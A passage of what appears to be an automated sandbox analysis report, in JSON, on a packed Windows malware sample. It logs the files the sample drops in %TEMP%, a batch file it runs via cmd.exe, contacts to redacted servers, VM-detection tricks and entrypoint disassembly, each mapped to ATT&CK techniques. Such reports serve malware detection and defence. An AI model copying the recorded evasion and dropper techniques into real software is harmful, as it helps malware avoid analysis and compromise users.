\"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"bauqs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"bauqs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"bauqs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"muniw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"muniw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"muniw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-2", "type": 10, "name": "Loads rich edit control libraries", "description": "\"muniw.exe\" loaded module \"%WINDIR%\\System32\\riched20.dll\" at 69620000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"bauqs.exe\" called \"CopyFileW\" to copy %TEMP%\\bauqs.exe to new location %TEMP%\\xyzuqi.exe (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"bauqs.exe\" (UID: 00000000-00005756)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00005740)\n Spawned process \"xyzuqi.exe\" with commandline \"OK\" (UID: 00000000-00004108)\n Spawned process \"muniw.exe\" (UID: 00000000-00001844)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000568)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:11110\"\n \"<IPv4>:11170\"\n \"<IPv4>:11110\"\n \"<IPv4>:11110\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"bauqs.exe\" (UID: 00000000-00005756)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00005740)\n Spawned process \"xyzuqi.exe\" with commandline \"OK\" (UID: 00000000-00004108)\n Spawned process \"muniw.exe\" (UID: 00000000-00001844)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000568)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00005740)\n Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000568)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" was detected as \"VMProtect\" and name: \"Protector\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"muniw.exe\" was detected as \"VMProtect\" and name: \"Protector\"\n \"muniw.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".-(H\" is \"0x353fba\" greater than 0x100000\n Virtual size of \".Jk)\" is \"0x664c30\" greater than 0x100000\n Virtual size of \"UPX0\" is \"0x125000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"muniw.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" file has an entrypoint instructions - \"push\tedx,pushfd\t,mov\tedx, 0x4a670ec0,call\t0x924839,inc\teax,xor\tebx, eax,add\tesi, eax,jmp\t0xe620d1,add\tesi, 4,rcr\tah, cl,movzx\teax, byte ptr [edi],add\tedi, 1,cmc\t,cmp\tsp, dx,xor\tal, bl,jmp\t0x9eb1eb,add\tedi, eax,jmp\t0x904a18,ror\tecx, 1,cmp\tsp, dx,test\tbx, sp,neg\tecx,jmp\t0xe9b632,jmp\tebp,movzx\teax, byte ptr [esi],adc\tdx, si,sbb\tdx, si,shld\tdx, ax, 0x31,add\tesi, 1,bsf\tdx, si,rcr\tcl, cl,\"\n \"muniw.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x526000,lea\tedi, [esi - 0x125000],mov\tdword ptr [edi + 0x14f9f4], 0x9bc47d1a,push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x5961b2,inc\tesi,inc\tesi,push\tebx,push\t0x1942c4,push\tedi,add\tebx, 4,push\tebx,push\t0x70180,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an writable section named \".text\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an writable section named \".reloc\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an writable section named \".htext\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an writable section named \".R*O\"\n \"muniw.exe\" has an writable section named \"UPX0\"\n \"muniw.exe\" has an writable section named \"UPX1\"\n \"muniw.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an executable section named \".text\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an executable section named \".?xL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an executable section named \".htext\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an executable section named \".-(H\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an executable section named \".Jk)\"\n \"muniw.exe\" has an executable section named \"UPX0\"\n \"muniw.exe\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".Jk)\" is \"0x664e00\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 6022049)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"bauqs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"muniw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"muniw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\muniw.exe]- [targetUID: 00000000-00004108]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"muniw.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"bauqs.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"xyzuqi.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\iphlpapi.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\iphlpapi.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe.Local\\\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe:Zone.Identifier\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:Zone.Identifier\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFINFO.INI\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\22F2B05A626DDA69A125EBAE613B9E923EAF29895B33AFD54D34925CC06C5D3E.EXE.LOCAL\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe:ZONE.IDENTIFIER\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:ZONE.IDENTIFIER\"\n \"bauqs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"bauqs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe.Local\\\"\n \"bauqs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe:Zone.Identifier\"\n \"bauqs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"bauqs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\BAUQS.EXE.LOCAL\"\n \"bauqs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe:ZONE.IDENTIFIER\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_VSLITE.BAT\"\n \"xyzuqi.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"xyzuqi.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe.Local\\\"\n \"xyzuqi.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\muniw.exe:Zone.Identifier\"\n \"xyzuqi.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" connecting to \"\\ThemeApiPort\"\n \"bauqs.exe\" connecting to \"\\ThemeApiPort\"\n \"xyzuqi.exe\" connecting to \"\\ThemeApiPort\"\n \"muniw.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\golfinfo.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\bauqs.exe\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\_vslite.bat\"\n \"bauqs.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\xyzuqi.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"bauqs.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bauqs.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"bauqs.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"xyzuqi.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xyzuqi.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"xyzuqi.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n 